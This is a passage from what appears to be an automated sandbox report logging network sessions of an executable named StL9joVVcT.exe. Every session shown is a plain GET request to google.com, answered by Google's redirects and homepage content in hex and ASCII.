                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                4192.168.2.649713142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-FQF7pOFm3JwnyH5piJFzvQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                5192.168.2.649716142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-GCpTqlb6sQnv9_Fqt9fO7Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                6192.168.2.649714142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-oOUk2DPFzEidwuSojJn9XQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                7192.168.2.649712142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-GT6i1LZZu3ggnG9QnUcjfg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                8192.168.2.649721142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-O6Qdr0vzcGsGC4Ma2ED1Ng' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                9192.168.2.649719142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-xWOecs08z_bQtsZe16uNoA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                10192.168.2.649718142.250.185.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: google.com
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                Location: https://www.google.com/
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-2fvTKjdTvv7OjYZL-2Qdlg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:03 GMT
                                                                                                                                                                                                                Expires: Thu, 13 Feb 2025 11:48:03 GMT
                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                Content-Length: 220
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2025-01-14 11:48:03 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                11192.168.2.649725142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-lRvzW2UsEppZS9-uclDMww' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-XmLcZ045KZQBVwvtgy6A8dzEsdkgkWvoJfHabKNDOxEe5lCeZMzdI; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=EQswxa0RWON5XXLbCnFIic7AO7230Xy__7EbA7txapKGJ2flZK9iSNYHXuSXGwm3FCSKp771SatYTXi92zKeQvJMbRUkyoO9Y1rYSmNjQdZM_afaMlEKaEH14JOWOKeWyn-o6iupFZ-sUEByK90fAi7Ts-ybsQ3213iuvXnMh3bmRYJSzK1YMDnEly3Y1TaY1mZYBTsq27KRFw; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC195INData Raw: 34 38 33 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                Data Ascii: 4833<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 31 36 2c 31 35 31 2c 32 37 32 2c 31 2c 38 39 2c 33 39 33 2c 32 38 38 2c 31 2c 33 31 2c 33 35 33 2c 32 2c 32 34 31 2c 31 37 32 2c 32 30 30 2c 32 35 39 2c 32 2c 37 2c 36 37 2c 33 36 37 2c 38 31 2c 31 34 32 2c 36 30 33 2c 35 37 2c 33 2c 32 32 2c 31 36 31 2c 39 31 35 2c 35 35 2c 31 2c 37 37 37 2c 31 37 35 2c 31 2c 38 32 2c 33 31 34 2c 31 38 32 2c 31 36 35 2c 38 34 2c 31 32 34 37 2c 35 39 34 2c 35 39 2c 32 30 31 2c 31 35 32 30 2c 31 37 2c 33 2c 33 32 30 2c 34 36 31 2c 31 39 31 38 2c 37 35 31 2c 34 34 30 2c 31 34 33 2c 39 33 2c 31 36 34 2c 33 2c 34 31 38 2c 37 30 32 2c 36 2c 32 2c 35 31 33 2c 33 37 37 2c 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 38 35 2c 37 38 2c 33 32 2c 36 39 34 2c 36 34 37 2c 34 2c 39 2c 32 31 30 2c 33 32 31 2c 31 37 37 2c 32 37 31 2c 31 2c 33 36
                                                                                                                                                                                                                Data Ascii: 16,151,272,1,89,393,288,1,31,353,2,241,172,200,259,2,7,67,367,81,142,603,57,3,22,161,915,55,1,777,175,1,82,314,182,165,84,1247,594,59,201,1520,17,3,320,461,1918,751,440,143,93,164,3,418,702,6,2,513,377,4,1,5,4,4,4,85,78,32,694,647,4,9,210,321,177,271,1,36
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f
